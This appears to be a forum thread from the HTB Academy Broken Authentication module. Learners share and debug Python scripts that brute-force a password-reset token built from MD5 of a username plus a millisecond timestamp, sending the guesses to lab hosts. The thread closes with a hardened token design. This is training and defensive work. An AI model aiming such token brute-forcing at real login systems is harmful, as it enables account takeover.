BROKEN AUTHENTICATION module | HTB Academy

Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force the support login, with a 30 sec delay between each req to prevent the lockout, and trying to decode the cookie, but I am stuck on that as well. Any hints? Happy to talk over DMs or Discord. Thanks!

I have about the same as you. Really not sure what’s wrong with it.

Did you find the solution to this problem?

I’m having issues with the first question. Here’s what I’m doing. Below is the script that I’m using, and I’m inputting the epoch time, which I converted using this website: https://currentmillis.com/. I’m converting the time in the response, after creating the reset token for htbuser, “And has been created at ”. I’m not getting anywhere with this, and it’s driving me crazy!

```python
from hashlib import md5
from sys import exit

import requests

url = "http://138.68.162.164:30826/question1/"

# Browser-like request headers
header = {
    "Origin": "http://138.68.162.164:32716",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://138.68.162.164:32716/question1/",
}

# Send the traffic through a local intercepting proxy
proxy_server = {"http": "http://127.0.0.1:8080"}

# Token creation time as epoch milliseconds
now = int(1665242225000)
start_time = now
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1500

# Try every millisecond from 1500 ms before to 1500 ms after the creation time
for x in range(start_time - 1500, endtime):
    raw_data = user + str(x)
    md5_token = md5(raw_data.encode()).hexdigest()
    data = {"token": md5_token, "submit": "check"}

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data, headers=header, proxies=proxy_server)

    # Any response without the failure text means the token was accepted
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()

exit()
```

Hey @RedDawn!

Good news is, your script works absolutely great. I just tested it, however, I removed the header and proxy from the post request.

I think your issue is in the epoch generation. Be very mindful of AM/PM when calculating it. I like this website: Epoch Converter - Unix Timestamp Converter

-onthesauce

Awesome, thank you! That site worked great


Can you help me?

```python
from hashlib import md5
from sys import exit

import requests

url = "http://161.35.162.182:30168/question1/"

# Token creation time as epoch milliseconds
now = int(1669172672000)
start_time = now
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1500

# Try every millisecond from 1500 ms before to 1500 ms after the creation time
for x in range(start_time - 1500, endtime):
    raw_data = user + str(x)
    md5_token = md5(raw_data.encode()).hexdigest()
    data = {"token": md5_token, "submit": "check"}

    print("checking {} {}".format(str(x), md5_token))

    # No custom headers are defined in this script, so none are sent
    res = requests.post(url, data=data)

    # Any response without the failure text means the token was accepted
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()

exit()
```

I get invalid token.
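
For the defensive side of this exercise, here is an added example (not code from the thread or from HTB) that puts the token scheme the scripts above assume, MD5 of username plus creation time in milliseconds, next to a hardened design. `ResetTokenStore`, its 15-minute lifetime and its attempt cap are assumptions chosen for illustration.

```python
import hashlib
import hmac
import secrets
import time


def weak_reset_token(user, created_ms):
    # Scheme assumed by the scripts in this thread: MD5(username + epoch ms).
    # Both inputs are guessable, so the token carries no secret at all.
    return hashlib.md5(f"{user}{created_ms}".encode()).hexdigest()


def _digest(token):
    return hashlib.sha256(token.encode()).digest()


class ResetTokenStore:
    """Hypothetical in-memory store; a real application would use its database."""

    def __init__(self, ttl_s=900, max_attempts=5):
        self.ttl_s = ttl_s
        self.max_attempts = max_attempts
        self._rows = {}  # user -> [sha256(token), expires_at, attempts_left]

    def issue(self, user, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        # Only the hash is stored, so a database leak does not expose live tokens.
        self._rows[user] = [_digest(token), now + self.ttl_s, self.max_attempts]
        return token

    def redeem(self, user, token, now=None):
        now = time.time() if now is None else now
        row = self._rows.get(user)
        if row is None:
            return False
        if now >= row[1] or row[2] <= 0:
            del self._rows[user]  # expired, or guessed at too many times
            return False
        row[2] -= 1
        if not hmac.compare_digest(row[0], _digest(token)):  # constant-time compare
            return False
        del self._rows[user]  # single use
        return True
```

With the weak scheme, anyone who knows the username and the approximate creation time has only a few thousand candidates to check; with the hardened one, the attempt cap invalidates the token long before a 256-bit value could be guessed.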